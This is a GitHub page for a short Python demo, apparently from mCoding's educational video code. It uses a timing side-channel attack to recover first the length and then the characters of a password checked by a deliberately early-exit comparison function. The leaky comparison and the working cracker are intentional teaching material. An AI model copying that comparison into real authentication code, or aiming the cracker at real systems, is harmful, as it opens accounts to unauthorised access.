forked from mCodingLLC/VideosSampleCode
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathtiming_attack.py
95 lines (73 loc) · 2.79 KB
/
timing_attack.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
import itertools
import random
import string
import timeit
import numpy as np
allowed_chars = string.ascii_lowercase + " "
password_database = {"james": "subscribe to mcoding"}
# Unless you have a very stable computer,
# you will only be able to crack the length of the password
# if you use this check_password
# def check_password(user, guess):
# actual = password_database[user]
# return actual == guess
# Using this check_password, you should be able
# to crack the full password.
def check_password(user, guess):
actual = password_database[user]
if len(guess) != len(actual):
return False
for i in range(len(actual)):
if guess[i] != actual[i]:
return False
return True
def random_str(size):
return ''.join(random.choices(allowed_chars, k=size))
def crack_length(user, max_len=32, verbose=False) -> int:
trials = 2000
times = np.empty(max_len)
for i in range(max_len):
i_time = timeit.repeat(stmt='check_password(user, x)',
setup=f'user={user!r};x=random_str({i!r})',
globals=globals(),
number=trials,
repeat=10)
times[i] = min(i_time)
if verbose:
most_likely_n = np.argsort(times)[::-1][:5]
print(most_likely_n, times[most_likely_n] / times[most_likely_n[0]])
most_likely = int(np.argmax(times))
return most_likely
def crack_password(user, length, verbose=False):
guess = random_str(length)
counter = itertools.count()
trials = 1000
while True:
i = next(counter) % length
for c in allowed_chars:
alt = guess[:i] + c + guess[i + 1:]
alt_time = timeit.repeat(stmt='check_password(user, x)',
setup=f'user={user!r};x={alt!r}',
globals=globals(),
number=trials,
repeat=10)
guess_time = timeit.repeat(stmt='check_password(user, x)',
setup=f'user={user!r};x={guess!r}',
globals=globals(),
number=trials,
repeat=10)
if check_password(user, alt):
return alt
if min(alt_time) > min(guess_time):
guess = alt
if verbose:
print(guess)
def main():
user = "james"
length = crack_length(user, verbose=True)
print(f"using most likely length {length}")
input("hit enter to continue...")
password = crack_password(user, length, verbose=True)
print(f"password cracked:'{password}'")
if __name__ == '__main__':
main()